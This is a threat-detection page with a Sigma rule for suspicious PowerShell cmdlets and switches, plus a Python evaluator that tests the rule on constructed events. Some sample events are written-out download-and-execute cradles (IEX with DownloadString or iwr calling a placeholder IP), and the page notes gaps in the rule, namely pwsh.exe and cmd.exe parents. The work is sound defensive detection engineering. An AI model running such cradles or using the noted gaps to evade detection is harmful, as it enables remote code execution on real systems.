Suspicious Powershell Cmdlets
Looks for cmdlets, methods, and switches in PowerShell command lines that may indicate malicious activity. Inspired by the 2022 Red Canary Threat Detection Report.
Sigma rule
```yaml
title: Suspicious Powershell Cmdlets
id: b3dfac86-1056-4b6b-9c67-db4a10a9e812
status: experimental
description: Looks for cmdlets, methods, and switches that may indicate malicious
    activity. Inspired by the 2022 Red Canary Threat Detection report.
references:
    - https://redcanary.com/threat-detection-report/techniques/powershell/
author: Micah Babinski
date: 2022/11/03
tags:
    - attack.execution
    - attack.t1059
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\powershell.exe'
        # windash: a leading '-' also matches the '/' switch form (e.g. /nop)
        CommandLine|contains|windash:
            - '-nop'
            - '-noni'
            - 'invoke-expression'
            - 'iex'
            - 'downloadstring'
            - 'downloadfile'
            - 'downloaddata'   # published as 'downloadata', a typo that never matches .DownloadData()
    condition: selection
falsepositives:
    - Unknown
level: high
```
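To see what the selection above actually fires on, here is an added example (not code from the original page or from the Sigma project) that re-implements the rule's matching by hand and runs it over a few constructed process_creation events. The `endswith`/`contains`/`windash` semantics are my own minimal approximation (case-insensitive matching; `windash` treats each `-` as also matching `/`), not pySigma or any backend's output, and the token list uses `downloaddata`, the spelling the rule intends. The IP addresses in the sample command lines are documentation addresses from TEST-NET-2.

```python
# Added example (not from the original page or the Sigma project): a minimal
# evaluator for this rule's 'selection' block over constructed process_creation
# events. The Sigma modifier semantics below are a hand-written approximation
# (case-insensitive endswith/contains; windash = each '-' may also be '/'),
# not pySigma or any backend's output.

IMAGE_SUFFIX = "\\powershell.exe"

# Values from the rule; 'downloaddata' is the spelling the rule intends
# ('downloadata' as published never matches .DownloadData()).
CMDLINE_TOKENS = [
    "-nop",
    "-noni",
    "invoke-expression",
    "iex",
    "downloadstring",
    "downloadfile",
    "downloaddata",
]


def windash_variants(token):
    """Expand a value the way the 'windash' modifier does: every '-' may be
    written as '/', so '-nop' also covers '/nop'. Assumption: only the ASCII
    dash/slash pair is handled (real backends also cover en/em dashes)."""
    variants = {""}
    for ch in token:
        alternatives = ("-", "/") if ch == "-" else (ch,)
        variants = {v + a for v in variants for a in alternatives}
    return variants


def selection_hits(event):
    """Return the rule values that fire on one event (empty list = no match).
    Sigma string matching is case-insensitive, so both sides are lowercased."""
    image = event.get("Image", "").lower()
    if not image.endswith(IMAGE_SUFFIX):
        return []
    cmdline = event.get("CommandLine", "").lower()
    return [
        tok for tok in CMDLINE_TOKENS
        if any(variant in cmdline for variant in windash_variants(tok))
    ]


# Constructed sample events (not real telemetry); 198.51.100.0/24 is TEST-NET-2.
SAMPLE_EVENTS = [
    {   # classic download cradle: -nop, IEX and DownloadString all fire
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object "
                       "Net.WebClient).DownloadString('http://198.51.100.7/a')\"",
    },
    {   # slash-style switches: only matched because of windash
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe /nop /noni -File C:\scripts\inventory.ps1",
    },
    {   # benign admin command: 'iexplore' contains the substring 'iex'
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -Command \"Stop-Process -Name iexplore -Force\"",
    },
    {   # same cradle launched through cmd.exe: Image is cmd.exe, so no match
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "cmd.exe /c powershell -nop -c iex $payload",
    },
    {   # PowerShell 7: pwsh.exe does not end with \powershell.exe, so no match
        "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
        "CommandLine": "pwsh.exe -nop -c \"iex (iwr http://198.51.100.7/b)\"",
    },
]


def evaluate(events=SAMPLE_EVENTS):
    """Return {event index: hits} for every event the selection matches."""
    results = {}
    for i, ev in enumerate(events):
        hits = selection_hits(ev)
        if hits:
            results[i] = hits
    return results


if __name__ == "__main__":
    for i, hits in evaluate().items():
        print(f"event {i}: ALERT on {hits}")
```

Three things worth checking before deploying the rule, all visible in the sample run: `iex` as a bare `contains` value is a substring match and fires on benign strings such as `iexplore`, so "Unknown" false positives will in practice include ordinary admin commands; `windash` only helps for the switch values (`-nop`, `-noni`), and `-noni` also matches the long form `-NonInteractive`; and the `Image|endswith: '\powershell.exe'` filter does not cover `pwsh.exe` (PowerShell 7) or a cradle whose parent process is `cmd.exe`, so a second selection for `\pwsh.exe` is a natural extension.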
References
- https://redcanary.com/threat-detection-report/techniques/powershell/
Related rules
- Suspicious WMI-Related Powershell Cmdlets
- Base64 Encoding in CMD or Powershell
- PowerShell Base64 Encoding
- Wscript.exe Executing Agreement Javascript in AppData Folder
- Command Shell Bypassing Security Controls